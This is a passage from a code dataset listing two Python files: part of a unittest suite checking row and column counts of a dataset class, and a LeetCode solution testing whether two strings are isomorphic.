        df1=pd.DataFrame(self.data)
        data=Dataset(name='01-01-2021.csv',df=df1)
        expected=58
        result=data.get_n_rows()
        self.assertEqual(result,expected)

    def test_get_n_cols(self):
        # The daily-report schema is expected to have 18 columns.
        df1=pd.DataFrame(self.data)
        data=Dataset(name='01-01-2021.csv',df=df1)
        expected=18
        result=data.get_n_cols()
        self.assertEqual(result,expected)
if __name__ == '__main__':
    # Run the test suite when this file is executed directly.
    unittest.main()
| amy-panda/EDAWebApp | src/test/test_data.py | test_data.py | py | 1,309 | python | en | code | 0 | github-code | 36 |
26579543800 | '''
Given two strings s and t, determine if they are isomorphic.
Two strings are isomorphic if the characters in s can be replaced to get t.
All occurrences of a character must be replaced with another character while preserving the order of characters. No two characters may map to the same character but a character may map to itself.
For example,
Given "egg", "add", return true.
Given "foo", "bar", return false.
Given "paper", "title", return true.
Note:
You may assume both s and t have the same length
'''
class Solution(object):
    """Determine whether two strings are isomorphic (LeetCode 205)."""

    def isIsomorphic(self, s, t):
        """Return True if the characters of `s` map one-to-one onto `t`.

        Checks the mapping in both directions so that no two characters
        of one string share a target in the other.

        Bug fix: the original returned True for unequal-length inputs
        such as ("ab", "a") because zip() silently truncates; strings of
        different lengths can never be isomorphic, so reject them first.
        """
        if not s and not t:
            return True
        if not s or not t or len(s) != len(t):
            return False
        return self.__isoHelper(s, t) and self.__isoHelper(t, s)

    def __isoHelper(self, s, t):
        """Verify every char of `t` is produced by exactly one char of `s`."""
        mappings = {}
        for c1, c2 in zip(s, t):
            if c2 in mappings and mappings[c2] != c1:
                return False
            mappings[c2] = c1
        return True
if __name__ == "__main__":
    # Smoke checks: "foo"/"add" maps f->a, o->d consistently; "aa"/"ab"
    # would need 'a' to map to both 'a' and 'b'.
    assert True == Solution().isIsomorphic("foo","add")
    assert False == Solution().isIsomorphic("aa", "ab")
assert True == Solution().isIsomorphic("ab", "ba") | msencer/leetcode-solutions | easy/python/Isomorphic.py | Isomorphic.py | py | 1,159 | python | en | code | 5 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.